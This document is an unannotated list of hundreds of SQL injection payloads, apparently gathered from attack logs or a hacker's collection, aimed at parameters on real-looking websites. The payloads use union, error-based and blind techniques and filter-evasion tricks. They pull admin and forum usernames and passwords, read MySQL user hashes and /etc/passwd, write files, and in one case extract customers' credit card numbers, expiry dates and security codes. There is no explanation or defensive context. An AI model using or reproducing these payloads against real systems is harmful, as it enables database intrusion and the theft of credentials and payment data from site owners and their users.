information_schema.columns/* -9 union select 1,2,3,concat(username,char(58),password),5,6 from admin -- -9 union select 1,2,3,concat_ws(0x3a,ID,UserName,UserPass,UserMail),5,6,7 from users/* -9 union select 1,2,3,concat_ws(0x3a,UserName,LoginName,PassWord,email,phoneNo) from tbl_adminusers-- -9 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -9 union select 1,2,3,convert(1 using latin1),5,6,7,8,9/* -9 union select 1,2,3,convert(version() using latin1),5,6,7,8,9 -9 union select 1,2,3,group_concat(0x0b,Username,0x3a,Password),5,6,7,8 from dulam_admin-- -9 union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables limit 16,1/* -9 union select 1,2,3,version(),5 -- 9' union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16# -9 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x55),0x55),4,5,6,7,8,9,0,1,2,3,4,5/* -9 union select 1,2,cast(concat(user_name,0x3a,user_password) as binary),4,5,6,7,8 from 4images_users limit 2,1/* -9 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_name='admins' limit 1,1/* -9 union select 1,2,concat(AdminName,0x20,AdminPwd),4,5,6,7,8,9 from Admin-- -9 union select 1,2,concat(user(),0x3a,version(),0x3a,database())-- -9 union select 1,2,concat(user(),0x3a,version()),4,5,6,7/* -9 union select 1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7 from user -9 union select 1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,6-- -9 union select 1,2,concat_Ws(0x3a3a,idadmin,usuario,password,email,activo,nivel),4,5,6 from admin -- -9 union select 1,2,concat_ws(0x3a,login,password),4,5,6,7,8,9,10 from users-- 9 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6-- -9 union select 1,2,concat_ws(0x3a,username,user_password),4,5,6,7 from phpbb_users/* -9 union select 1,2,concat_ws(0x3a,Userusuario,passUsuario),4,5,6 from usuarios_panel -- -9 union select 1,2,concat_ws(0x3a,version(),database(),user()),4-- 9 UNION SELECT 1,2,concat_Ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 9 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9/* -9 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14/* -9 union select 1,2,concat_ws(0x3C6272202F3E,DATABASE(),USER(),VERSION()),4,5 -9 union select 1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8/* -9 UNION SELECT 1,2,convert(concat(username,char(58),password) using latin1),4 FROM arjan.users/* -9 union select 1,2,database(),user(),5,6,version(),8,9-- -9 union select 1,2,group_concat(0x0b,admin_login,0x3a,admin_password),4,5,6,7,8,9 from admin-- -9 union select 1,2,group_concat(0x3a3a,id_usr,email_usr,0x3a3a,password_usr),4,5 from users_usr -- -9 UnIon selECt 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_shema=database()-- 9 union select 1,2,group_concat(table_name),4 from information_schema.tables-- -9 union select 1,2,group_concat(table_name separator 0x3a),4,5,concat_ws(0x3a3a3a,user(),database(),version()),7 from information_schema.tables where table_schema=0x706f727461696c -- -9 union select 1,2,unhex(hex(concat_ws(0x3a,version(),user()))),4,5-- 9 union select 1,concat(user(),0x3a,database(),0x3a,version()),null,4,5,6,7/* -9 union select 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from user -- -9 UNION SELECT 1,concat(username,0x3a,user_password,0x3a,user_icq,0x3a,user_email,0x3a,user_aim,0x3a,user_yim,0x3a,user_msnm,0x3a,user_occ),3 FROM phpbb_users/* -9 union select 1,concat(username,char(58),user_icq,char(58),user_password),3,4,5,6,7,8,9 from phpbb_users limit 1,1/* -9 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5-- -9 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8 -9 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)-- -9 union select 1,concat_ws(0x3a3a,admin_email_address,admin_password),3,4,5 from admin/* -9 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),group_concat(0x0b,adresse,0x3a3a,mdp),4,5,6,7 from membre-- -9 union select 1,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()) -9 union select 1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,0 from _Users/ 9 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7 from admin_login limit 2,1/* -9 union select 1,concat_ws(0x3a,user(),version()),3,4-- 9 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5 -- 9 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9 -9 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13 -9 union select 1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -9 union select 1,concat_ws(0x40,user(),database(),version()),3,4,5,6,7,8,9,10,11,12 from users/* -9 union select 1,concat_ws(version(),0x3b,user(),0x3b,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 -9 union select 1,convert(version() using latin1),3,4,5,6,7,8,9 from users -9 union select 1,database(),version(),4,5,6,7,8,9,10,11,user()/* -9 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x636C5F6E657773 /* -9 union select 1,group_concat(username),3,4,5,6 from users -- -9 union select 1,null,concat(user_name,char(58),user_password),4,5 FROM photo_users/* -9 union select 1,SQL,3,4,5-- -9 union select 1,table_name,table_schema,version(),5,6,7,8,9,0 from information_schema.tables/* -9 union select 1,user(),3,4,5,6,7,8,9 -- -9 union select 1,user(),3,4,5,version()/* -9 union select 1,username,password,4,5,6,7,8,9 from db_user/* 9 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user -9 union select 1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -9 union select concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version()) from rkh8t5po -9 union select concat(0x3,version())/* -9 union select concat(user(),0x3a,0x3a,database(),0x3a,0x3a,version())/* -9 UNION SELECT concat(username,char(58),passwd) from user limit 141,141 -- -9' union select concat(version()),2,3,4,5,6and'1'='1 -9 union select concat_ws(0x0b,version(),user(),database(),@@version_compile_os)-- 9 union select concat_ws(0x3a,database(),user(),version()),2,3-- 9 union select concat_ws(0x3a,version(),user(),database(),@@version_compile_os) -9 union select database()/* -9 union select group_concat(0x3a,version(),user(),@@version_compile_os),2,3,4 -- -9 union select group_concat(login,0x3a,password),2,3 from user-- 9 union select null,null,null/* -9' union select null,null,null,null,null,null,null,null,password,user,null,null,null,null,null,null,null,null,null,null,null,null from mysql.user limit 0,1 INTO OUTFILE 'test'/* -9 union select unhex(hex(concat_ws(0x3a,version(),database(),user()))),2,3,4,5,6,7-- -9 union select unhex(hex(concat_ws(0x3a,version(),user(),database())))-- -9 union select unhex(hex(version())),2/* a138 and substring(version(),1,1)=4 a43947323 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13 -- aaa' or 1=1/* aaa' or 1=1 union select 11111 limit 16,1/* aaa' union select 1/* aaa' union select NULL,NULL,version(),database(),user(),NULL,NULL,NULL,NULL,NULL,1,2,3,4,5,6,7,8,9,20,1 -- a%25') and 1=@@version-- aa') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* ## actu.php?id_actu=-1 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10/* (added_on*if(ascii(substring((select version() from information_schema.tables limit 1,1),1,1))=53,1,-1)) -adig' union select 1,2,3,4,concat_ws(0x3a,database(),user(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- alpine_boots where 1=2 union select version(),2,3,4,5,6,7,8,9,0,1,2,1,4,5,6,7,8,9,0,1,2,3,4,5,6,7-- -Alumni_Services' union select 1,concat(name,char(58),pass) from users limit 0,1 /* Âñå ðåãèîíû' union select 1,group_concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12-- ' and 0 union select 1,2,3,username,5,password,7,8,9,10,11 from #__users# and 1=0 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- %25' and (1,1)=(select count(*),concat(version(),floor(rand(0)*2))from essentials group by 2) -- ' and 1=1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4 -- ' and 1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12 from jos_users/* and 1=2 union select 1,concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from amp_forum_users-- ' and (select*from(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select concat_ws(0x3a,version(),database(),user()) from INFORMATION_SCHEMA.TABLES limit 0,1),1,64),floor(rand(0)*2)))z)-- ## ...a,password,0x3a,host),4,5,6,7,8 from mysql.user limit 1,1-- -apoio_psicologico' union select 1,2,3,4,5,6,7,8,9 -- artist union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14 -- asd' and 1=0 union select 1,2,3,4,5,version(),7 -- athletics' and substring(version(),1,1)=4-- a' union select 1,2,3 from sp_areadetails where '1'='1 balt' aNd 1=0 UNION SELECT 1,version() -- bbb' UNION SELECT 1,2,3,concat_ws(0x3a,user(),version(),database())-- bbb' UNION SELECT 1,2,3,group_concat(version(),0x3a,user(),0x3a,database()) -- ## besieged 1998 dvdrip part3 rar-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- BG union select 0,concat(user(),0x3a,version(),0x3a,database()),2/* BIOS') union select 1,2,concat_ws(0x3a,username,user_password) from phpbb2_users# -bndom' union all select 1,2,version(),4-- b' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('VALID_SUBJECT_CODES','dtproperties','eJournals','Item_Subject_Linker','LIBRARY_COMPLETENESS','LIBRARY_INDEX','LIBRARY_LOCATION','LIBRARY_PUBLICATION','LIBRARY_REORDER','LIBRARY_STATUS','LIBRARY_SUBJECT','LIBRARY_TITLE','pJournals','Sfx_e_journals','sJournals','Subject_Codes','sysconstraints','syssegments','VALID_BUILDING_CODES','VALID_COLLECTION_CODES','VALID_INDEX_CODES'))-- b' or 1=@@version-- -brother7427 union select 1,2,user_name,user_password,5,6,7,8,9,10,11,12,13,14,15,16,17FROMuvarovka_galllery_users/* business' union select 1,2,concat(user,0x3a,password),4,5,6,7,8 from mysql.user/* -bzU1UjCC' union select 1,2,table_name from information_schema.tables limit 35,1/* -c10' union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),database(),version()),14,15,16,17,18,19,20,21 -- can' union select 1,2,3,4,5,version(),7,concat_ws(char(58),login,password),9,10,11 from users/* CANV3 and 1=0 union select 1,2,3,4,5,6,concat_ws(0x3a,username,password,email),8,9,10,11 from admin-- carlnomura_-1 union select 1,2,3,4,5,6,7,8,9,10,11,12/* cast((SELECT version()||chr(58)||current_user||chr(58)||current_database()) as int)-- cat;id=-1' union select concat_ws(0x3a,user(),database(),version()) -- cat_id=42 AND prod_id=-3 union select 1,2,user(),4,5,6,7,8-- cell' union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables limit 0,2/* CHAR(39) UNION SELECT 1,version(),3,4,5,6,7,concat_ws(0x3a,user(),database()),9,10,11,12 -- char(49,57,39) AND 1=2 UNION SELECT 1,2,CONCAT_WS(USER(),VERSION(),DATABASE()) -- -CH_HQS_GAM' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 /* -clients' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 -- concat((/*!select*/(version())/*!fRom*/(information_schema.tables)limit/**/0,1),rand(0)|0) having max(0)# contaAct' union select 1,2,3,4,5,6,7,8,9,10,user() from information_schema.tables/* -contacts' union select concat_ws(0x3b,Version(),database(),user()) -- -contact' union select 1,2,user(),4,5,6-- cont'union select 1,2,3,user()/* convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1 convert(numeric,(select max(dbname) from master..syslogins))-- ##"cookie_reg=-101union select version()-- c' order by 99 -CSKA') union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9/* current' union select 1,2,3,4,concat_ws(0x3a,username,user_password),6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23 from phpbb_users limit 1,1-- cygnet' and 1=2 union select 1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7/* D643' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('plyrbioHTML','ContestInfo_bak','rankdates','SQLINJECTION','rankmast','RollingRank','sglbest14','PlayerEquip','sglbest14roll','sglmtchfact','PlayerEquip_backup','ClipBTournEntryPossibles','cntrymast','cntrymast_Latino','ContestInfo','dblbest14','dblbest14roll','dblno1plyr','dblrndrsl','dblrndrslXX','dbltrnrsl','dbltrnrslroll','dblwinstreak','dtproperties','DW_EventHistoryByTrnYearTrnNum','DW_SglRaceRankByCountry','emailtemp','ENTY_PlayerProperty')) D8QRMCU00' union select 1,2,3,4,5,6,7,8,9,0,version(),2/* d' and 1=2 union select 1,2,3,4,version(),6,7,8,9/* -О' union select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,user(),16/* ekon' union select 1,2,version(),user(),5,6 limit 160,100/* emty' union select 1,2,version(),user(),database()/* -escada' union select 1,concat_ws(0x3a,login,password),3,4,5,6 from ochki_cms_users limit 1,1 -- -Ê' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5 -- EUR' and 1/* FacilityID and 1=0 -fanclub3' union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10 and '1'='1 -FFE #8' union select 1,2,3,4,5,6,7,8,9 -- fffff' and 1=1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11 -- flag or(1,1)=(select count(0),concat((select database() from btit_users limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- flag or(1,1)=(select count(0),concat((select database() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- Font' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,user(),database(),22,23,24,25,26,27,28,29/* Fruit Chunky' union select @@version,2-- FT305' union select 1,2,3,4,5,6,7,8,9,concat_ws(char(58),email,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from users -- fuck' UNION SELECT concat_ws(0x3a,version(),user(),database())/* gallery.imgview.1234567' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10 -- gemaglabin') and 1=0 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14 From INFORMATION_SCHEMA.TABLES LIMIT 1,1/* gkrellsun' UniOn selEct concat(version(),':',user()),2,3,4/* gloomery' union select 1,2,concat_ws(0x203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* gordeeva' union select 1,COLUMN_NAME,3,4,5,6,ORDINAL_POSITION,TABLE_NAME,9 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA!='INFORMATION_SCHEMA'-- grip_x29' union select 1,2,3,4,5,6,7,8,9-- HA5145' or 1=0 HB2050' OR 1=(select @@version)-- hideoe' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5 -- Ho' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* id:-00000043398 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- id=-99 /*!UnIoN SeLeCt*/ 1,2,3,cOnCaT(cust_fname,0x3a,cust_lname,0x3a,cust_email,0x3a,cust_address,0x3a,cust_country,0x3a,cookie_code,0x3a,order_status,0x3a,order_date,0x3a,city,0x3a,state,0x3a,poscode,0x3a,phone,0x3a,mobile,0x3a,card_name,0x3a,card_number,0x3a,credit_exp,0x3a,card_security),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from m_order where credit_exp!=0limit213,812-- -Idefix and Ariane 42B' union select 1,2,3,4,version(),6,7,8-- ijpr union select 1,file_priv,3,4 from mysql.user -- -industry_newsletters' union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6 order by '1'='1 -initiative_09.01.01_u' union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12 -- INTL' union select @@version-- Introduction' or 1 group by concat((select user()),floor(rand(0)*2)) having min(0)-- INT' union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* iuc,20,1764,1768 and 1=@@version j66010243' and 1=@@version-- jgeosci.-059' union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13-- jksdelly' union select relname,null,null from pg_class where relname<>'alum_person' and relname<>'alum_person_alumid_seq' and relname<>'alum_position' and ''=' LCT2795' and 1=1-- LCT2795' or 1=@@version-- LegalServises' union select 1-- limit 0,1-- lol' union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* love_main union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user_id,paswd321),0x71),0x71),4,5,6,7,8 from love_inc-- -lynx' union select 1,2,3,concat_ws('.',table_schema,table_name,column_name),5,6,7,8,9,10 from information_schema.columns -- MarketInfo' AND 1=2 UNION SELECT CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE()) -- MG' or 1=(select top 1 table_name from information_schema.tables) -- modis' union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,database(),user(),version()),13-- motorcycles' or 1=(select @@version)-- -MX-MexicoCity-IPCOM' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,VERSION(),22,23,24,25,26,27,28,29,30,31/* -n6680' union select 1,2,concat_ws(0x3a3a,version(),database()),4,5,6 /* narks1" UNION SELECT 1,2,column_name,4,5,6,7,8,9 FROM information_schema.columns LIMIT 0,1/* ne_tot_seo' union select 1,convert(version() using cp1251),convert(concat(table_name,0x207c20,column_name) using cp1251),4 from information_schema.columns limit 150,150/* news-359 union select 1,2,user,4,password,6 from mysql.user/* news-99999 union select concat(Username,0x3a,Password),2,3,4,5,6 from int_users-- news_sait where 1=2 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14 from st_news_sait -news' union select 1,2,3,4,concat_Ws(0x3a,user(),database(),version()),6,7,8,9,10 -- -news' union select 1,2,3,user(),database(),version(),7,8,9/* nickname' UNION SELECT 1,2-- null and 1=2 union select 1,2,3,4 null' and 1=2 union select 1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from userindex-- null and 1=2 union select 1,version(),3,4,5,6 null union all select 1,2,3,4,concat(0x2f,version(),0x2f,user(),0x2f,database(),0x2f),6,7,8,9,10/* null UNION ALL SELECT 1,convert(concat(user,0x3a,password) using latin1),3,4 FROM mysql.user-- null union all select null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,Version(),Database(),User(),0x27293C2F7363726970743E),null,null,null,null,null,null -- null union all select null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E) -- null union all select null,null,null,null,null,null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E),null,null,null,null,null,null,null,null,null,null,null,null,null,null null union select 1,2,3,4,5,6/* null union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_password),14 from tbl_user-- null union select 1,2,3,4,5,6,7,concat(table_name,0x3a,column_name),9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns/* null union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from J null union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10 null UNION SELECT 1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7 from allmyphp_user where user_id=1-- null' Union Select 1 ,2,3,concat_ws(char(58),user,password),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201 from mysql.user/* null union select 1,2,concat(user,0x3a,password),4,5,6,load_file(0x2f6574632f706173737764),8,9,version(),user() from mysql.user-- null union select 1,2,concat(user(),char(59),version()),4/* -null union select 1,2,concat(version(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* null UNION SELECT 1,concat_ws(0x202d20,version(),user(),database()),3,4,5,6-- null union select 1,version(),3,4,5,6-- null union select concat_ws(0x3a,table_name) from information_schema.tables limit 16,1/* -null union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- null union select concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os) -- null union select null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null,null,null null union select null,null,concat_ws(char(32,124,32),version(),user(),database()),null,null,null,null,null,null,null,null,null,null,null,null -- nx' union select 1,2,concat(version(),'::',user(),'::',database()),4,5,6-- oai:ircam.fr:programmation:281' and 1=0 union select group_concat(concat_ws(0x3a3a,user,password)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from mysql.user -- oatlands' aNd 1=0 UNION SELECT 1,2,3,4,5,version(),7 -- Omer' union select 1,LOAD_FILE('/etc/passwd'),3/* onewsaction=linkid=-1 union select 1,2,3,convert(aes_decrypt(aes_encrypt(concat(email,0x3a,username,0x3a,password),0x71),0x71),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from jos_users-- opit' UNION SELECT 1,user,3,4,5,6,7,8 FROM mysql.user/* ' or 1 ' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='LOG' AND COLUMN_NAME NOT IN ('addr','xxx',))-- ' or 1=(selecttop1table_namefrominformation_schema.tables)-- ' or 1=system_user-- P008'or 1=@@version and ''=' ## -P:229-S:41 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 limit 1,1 -page01' union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5# PD' or 1=1 union select 1,2,3,group_concat(TABLE_SCHEMA,'.',TABLE_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.TABLES where table_name like '%25user%25' -- politicsgossip limit 0 union select 1,2,3,4,5,6/* -pollanenm' UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13-- 'PO' union select/**/0,2,3,4,5,6,7,8,9/* press UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3 -- product-17 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)) having min(0) or 1-- product-230 and 1=0 union all select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- product/def-20 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)) having min(0) or 1-- product/show-7 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)) having min(0) or 1-- ## profsh_user P' union select 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database()),0x71),0x71),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* Queen' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13 from onecms_users -- Reference and 1=0 union select concat_ws(0x3a,user_name,user_password),2,3,4,5,6 from DEV_mediawiki.ts_user -- ro union select 1,2,3,4,5 -- RRR' union select null,BANNER||user,null,null,null,null,null,null,null,null,null,null,null,null,null from v$version-- ru union select 1,2,3,4,5,6 -- s_62222222 union select 1,username,password from users-- SB' AND 1=(select @@version)-- sdf' union select concat_ws(0x203a20,username,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2,2,2,2,2,2,2,2,2,2,2,2,2,2 FROM person limit 1,1/* select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(concat_ws(0x3a,login,password) SEPARATOR '
'),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 from veter142_narazdva.nrd_partners */select 1,2,3,4,5 table_name information_schema.columns-- selECt 1,2,3,concat_ws(0x3a,username,PASSWORD),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from admin limit 0,1 -- selECt 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17 from admin -- selECt 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14 from admin -- select 1,2,concat_ws(0x3a,email,password),4,5,6 from users -- select 1,concat_ws(0x3A,username,password,email),3,4,5,6,7,8 from mos_users/* (select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2 limit 1)a)-- (select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from SC_news_table group by 2 limit 1)a)-- (select 1 from (select count(0),concat(version(),floor(rand(0)*2)) from phpbb_kb_categories group by 2 limit 0,1)a)-- select 1,table_name,3,4 from information_schema.tables -- select concat_ws(0x3a,ID,NAME,DOL,ORG,MAIL) (select count(*) from (select 1 union select 2 union select 3)x group by concat((SELECT concat_ws(':',version(),database(),user(),@@version_compile_os,@@tmpdir,@@datadir)),floor(rand(0)*2)))-- (select*from(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select user() from INFORMATION_SCHEMA.TABLES limit 0,1),1,64),floor(rand(0)*2)))z) (SELECT * FROM(SELECT * FROM(SELECT NAME_CONST(database(),14)a) as t JOIN (SELECT NAME_CONST(database(),14)a)a)a) (SELECT * FROM(SELECT * FROM(SELECT NAME_CONST(user(),14)a) as t JOIN (SELECT NAME_CONST(user(),14)a)a)a) (SELECT * FROM(SELECT * FROM(SELECT NAME_CONST(version(),14)) as t JOIN (SELECT NAME_CONST(version(),14))b)c) (select*from(select name_const(version(),1),name_const(version(),1))a) (select if(ascii(substring(version(),1,1))=53,propertyid,city)) (select min(@:=1)from (select 1 union select 2)k group by concat(version(),@:=@-1))-- (select top 1 cast(username as nvarchar) ':' cast(password as nvarchar) from users)-- (select top 1 password from users) (select top 1 password from users)-- (select top 1 table_name from information_schema.columns where column_name=CHAR(112) char(97) char(115) char(115) char(119) char(111) char(114) char(100))-- (select top 1 table_name from information_schema.tables) (select top 1 table_name from information_schema.tables)-- (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN 